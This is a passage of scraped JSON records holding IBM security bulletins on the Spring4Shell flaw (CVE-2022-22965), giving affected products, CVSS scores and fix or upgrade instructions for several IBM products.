**[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Netcool Impact| 7.1.0 \n \n\n\n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by upgrading: \n\nProduct| VRMF| APAR| Remediation \n---|---|---|--- \nIBM Tivoli Netcool Impact 7.1.0| 7.1.0.26| IJ39753| Upgrade to [IBM Tivoli Netcool Impact 7.1.0 FP26](<https://www.ibm.com/support/pages/node/6587919> \"IBM Tivoli Netcool Impact 7.1.0 FP26\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T14:00:50", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Netcool Impact is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-07-05T14:00:50", "id": "73A0E3B8972417A5C5268EE0E3803B9B8C2E0463C9659C6C828573AC1D00D1AB", "href": "https://www.ibm.com/support/pages/node/6601301", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:22", "description": "## Summary\n\nHMC is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Cloud connector service if enabled will use only the spring, as in a client to make only the REST calls with IBM Cloud Mangement Console. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nHMC V10.1.1010.0| V10.1.1010.0 and later \nHMC V9.2.950.0| V9.2.950.0 and later \n \n\n\n## Remediation/Fixes\n\nThe following fixes are available on IBM Fix Central at: <http://www-933.ibm.com/support/fixcentral/>\n\nProduct\n\n| \n\nVRMF\n\n| \n\nAPAR\n\n| \n\nRemediation/Fix \n \n---|---|---|--- \n \nPower HMC\n\n| \n\nV9.2.952.0 ppc\n\n| \n\nMB04331\n\n| \n\n[MH01925](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMCppc&release=V9R2&platform=All> \"MH01913\" ) \n \nPower HMC\n\n| \n\nV9.2.952.0 x86\n\n| \n\nMB04330\n\n| \n\n[MH01924](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMC&release=V9R2&platform=All> \"MH01912\" ) \n \nPower HMC\n\n| \n\nV10.1.1010.0 ppc\n\n| \n\nMB04335\n\n| \n\n[MF69724](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~9100HMCppc&release=V10R1&platform=All> \"\" ) \n \nPower HMC\n\n| \n\nV10.1.1010.0 x86\n\n| \n\nMB04334\n\n| \n\n[MF69722](<https://www.ibm.com/support/fixcentral/main/selectFixes?parent=powersysmgmntcouncil&product=ibm~hmc~vHMC&release=V10R1&platform=All> \"\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T07:22:34", "type": "ibm", "title": "Security Bulletin: HMC is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T07:22:34", "id": "3AAC421D0DF5831B3220FCCBA6EA78CC01A191BC68D1B4BF16F97C53C8358B64", "href": "https://www.ibm.com/support/pages/node/6591147", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:23", "description": "## Summary\n\nIBM Security SOAR is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Access to the Spring Framework is through internal, trusted APIs only. The fix includes Spring version 5.2.20.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n**DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s) | Version(s) \n---|--- \nIBM\u00ae Security SOAR | \n\nIBM Security SOAR versions 26 - 44.1 \n \n## Remediation/Fixes\n\nIBM encourages customers to promptly update their systems.\n\nUsers must upgrade to v44.2.0 or higher of IBM SOAR in order to obtain a fix for this vulnerability. You can upgrade the platform and apply the security updates by following the instructions in the \"**Upgrade Procedure**\" section in the [IBM Documentation](<https://www.ibm.com/docs/en/rsoa-and-rp/42?topic=guide-upgrading-platform> \"IBM Documentation\" ).\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:13:20", "type": "ibm", "title": "Security Bulletin: IBM Security SOAR is affected but not classified as vulnerable to remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T00:13:20", "id": "2F810DF5129E61B7AECC07F3698A4E88FEDD4A1E7CA3A999FA93E04C4733C72C", "href": "https://www.ibm.com/support/pages/node/6571299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:29", "description": "## Summary\n\nIBM Common Licensing is affected but not classified as vulnerable to a remote code execution in Spring Framework (220575, CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. In IBM Common Licensing Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19 and is Spring- webmvc dependent. The fix includes Spring 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** IBM X-Force ID: **220575 \n** DESCRIPTION: **Spring Framework could allow a remote authenticated attacker to execute arbitrary code on the system, caused by an unsafe deserialization in the SerializableTypeWrapper class. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/220575 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/220575>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Common Licensing| ART 8.1.6 \nIBM Common Licensing| ART 9.0 \nIBM Common Licensing| Agent 9.0 \n \n\n\n## Remediation/Fixes\n\nThe 220575,CVE-2022-22965 flaw lies in Spring Framework. Spring has provided update fixes (Spring Framework 5.2.20 &amp; 5.3.18+). The advisory cautions that the vulnerability is \"general, and there may be other ways to exploit it.\" \nIBM strongly recommends addressing the Spring framework vulnerability now by applying the suggested fix that uses Spring Framework 5.3.19. \n\n \nApply the ART and Agent ifix from fix central :\n\n[IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1](<http://www.ibm.com/support/fixcentral/quickorder?product=ibm%2FRational%2FRational+Common+Licensing&fixids=IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1&source=SAR> \"IBM_LKS_Administration_And_Reporting_Tool_And_Agent_90_Spring_ART_LDAP_iFix_1\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-30T08:57:45", "type": "ibm", "title": "Security Bulletin:IBM Common Licensing is affected but not classified as vulnerable by a remote code execution in Spring Framework (220575,CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-30T08:57:45", "id": "81F73DF562970E5239B639CE59B471B9D34E39C4A5BDD496165656D76C34B09B", "href": "https://www.ibm.com/support/pages/node/6590823", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:05:34", "description": "## Summary\n\nIBM API Connect V10 is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it meets all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. This Spring vulnerability only exists, if clients installed the optional API Connect V10 Application Test and Monitor function. The fix includes Spring-boot 2.6.6, Spring-core 5.3.18 and Spring-framework 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAPI Connect| API Connect V10.0.0.0 - V10.0.1.1 \n---|--- \n| \n| \n \n\n\n## Remediation/Fixes\n\nAffected Product| Addressed in VRMF| APAR| Remediation/First Fix \n---|---|---|--- \n \nIBM API Connect \n\nV10.0.0.0-V10.0.1.1\n\n| 10.0.1.**&lt;X&gt;**| | Please see links to various resources for a quick ref. \n\n10.0.1.6-ifix1 \nRelease Announce notes: <https://www.ibm.com/support/pages/node/6571315> \nIBM Docs: <https://www.ibm.com/docs/en/api-connect/10.0.1.x?topic=aco-whats-new-in-latest-release-version-10016-ifix1-eus> \nFix Central: [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&amp;product=ibm/WebSphere/IBM+API+Connect&amp;release=10.0.1.6&amp;platform=All&amp;function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.1.6&platform=All&function=all>)\n\n10.0.4.0-ifix3 \nRelease Announce notes: <https://www.ibm.com/support/pages/node/6571313> \nIBM Docs: <https://www.ibm.com/docs/en/api-connect/10.0.x?topic=aco-whats-new-in-latest-release-version-10040-ifix3> \nFix Central: [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&amp;product=ibm/WebSphere/IBM+API+Connect&amp;release=10.0.4.0&amp;platform=All&amp;function=all](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/IBM+API+Connect&release=10.0.4.0&platform=All&function=all>) (Filter fix details: 10.0.4.0-ifix3 ) \n \n| | | \n| | | \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-05T16:59:52", "type": "ibm", "title": "Security Bulletin: API Connect V10 is vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-05T16:59:52", "id": "F243281320AFD7E2710EDC7B3D2DE73901C6546A063CD6DB1074893EA50F7F8E", "href": "https://www.ibm.com/support/pages/node/6583065", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:42", "description": "## Summary\n\nIBM Sterling Connect:Direct for UNIX is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The fix includes Spring 2.6.6.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling Connect:Direct for UNIX| 6.2.0.0 - 6.2.0.3.iFix010 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerability now.**\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Sterling Connect:Direct for UNIX| 6.2.0.0 - 6.2.0.3.iFix010| Apply 6.2.0.3.iFix013, available on [Fix Central](<https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EOther%20software&product=ibm/Other+software/Sterling+Connect%3ADirect+for+UNIX&release=6.2.0.3&platform=All&function=fixId&fixids=6.2.0.3*iFix013*&includeSupersedes=0> \"Fix Central\" ) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-24T17:28:25", "type": "ibm", "title": "Security Bulletin: IBM Sterling Connect:Direct for UNIX is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-05-24T17:28:25", "id": "D5953B5AA5D620CA09590EAFE9008DB4A5BD219E8F43809D51B746D7643FA0F7", "href": "https://www.ibm.com/support/pages/node/6589575", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:37", "description": "## Summary\n\nWatson Machine Learning Accelerator is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. WMLA use spring framework to manage java application's dependency injection, events, resources, i18n, validation, data binding, type conversion, SpEL, AOP. The fix includes Spring 5.3.19.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Machine Learning Accelerator| \n\n2.2.0;2.2.1;2.2.2;2.2.3 \n2.3.0;2.3.1;2.3.2;2.3.3;2.3.4;2.3.5;2.3.6;2.3.7;2.3.8 \n1.2.1;1.2.2;1.2.3 \n \n \n\n\n## Remediation/Fixes\n\n**1\\. For Watson Machine Learning Accelerator version 2.2.x**\n\nTo address the affected version, upgrade to IBM Watson Machine Learning Accelerator 2.2.4 by following the document <https://www.ibm.com/docs/en/cloud-paks/cp-data/3.5.0?topic=accelerator-upgrading-watson-machine-learning>\n\n**2\\. For Watson Machine Learning Accelerator version 2.3.x**\n\nTo address the affected version, upgrade to IBM Watson Machine Learning Accelerator 2.3.9 by following the document <https://www.ibm.com/docs/en/wmla/2.3?topic=installation-install-upgrade>\n\n**3\\. For Watson Machine Learning Accelerator version 1.2.3**\n\nTo address the affect version, install the interim fix 601147 from the following location: <https://www.ibm.com/eserver/support/fixes/> with fix id: dli-1.2.3-build601147-wmla \n\nNote: For the version 1.2.1,1.2.2, first upgrade the cluster to version 1.2.3 by following the document <https://www.ibm.com/docs/ro/wmla/1.2.3?topic=upgrading-wml-accelerator>, then install the interim fix 601147.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T02:33:07", "type": "ibm", "title": "Security Bulletin: Watson Machine Learning Accelerator is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-01T02:33:07", "id": "E9F0B13DD28C1AFA3EA944A83A0281284C2444069758D5085ED5787CB960A8C5", "href": "https://www.ibm.com/support/pages/node/6591113", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:06:52", "description": "## Abstract\n\nIs Sterling Order Management affected by Spring vulnerability CVE-2022-22965?\n\n## Content\n\nIBM is aware of a recently surfaced vulnerability [CVE-2022-22965](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>) and has evaluated whether any Sterling Order Management applications are affected. The following is a summary of our evaluation:\n\nComponent | \n\nSpring \nversion\n\nused\n\n| Impacted by \nCVE-2022-22965 | \n\nImmediate\n\nMitigation\n\nPlan\n\n| Latest Status \n---|---|---|---|--- \nSterling Order Management SaaS, On-prem and Certified Containers (including Store Engagement &amp; Call Center) | Not used | No | N/A | Not vulnerable \n \nInventory Visibility\n\nMicroservice \n\n| Not used | No | N/A | Not vulnerable \n \nIntelligent Promising\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOMS Data Exchange Service | Not used | No | N/A | Not vulnerable \n \nStore Inventory Management\n\nMicroservice\n\n| Not used | No | N/A | Not vulnerable \nOrder Hub | Not used | No | N/A | Not vulnerable \nSterling Fulfillment Optimizer | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Omni-Configurator and Visual Modeler | Not used | No | N/A | Not vulnerable \nConfigure, Price, Quote (CPQ): Field Sales | Not used | No | N/A | Not vulnerable \n \n## Related Information \n\n[Spring Framework RCE, Early Announcement - spring.io](<https://spring.io/blog/2022/03/31/spring-framework-rce-early-announcement>)\n\n[CVE-2022-22965 - National Vulnerability Database](<https://nvd.nist.gov/vuln/detail/CVE-2022-22965>)\n\n[CVE-2022-22965 - mitre.org](<https://vulners.com/cve/CVE-2022-22965>)\n\n[CVE-2022-22965: Spring Framework RCE via Data Binding on JDK 9+ - vmware.com](<https://tanzu.vmware.com/security/cve-2022-22965>)\n\n[{\"Type\":\"MASTER\",\"Line of Business\":{\"code\":\"LOB59\",\"label\":\"Sustainability Software\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o 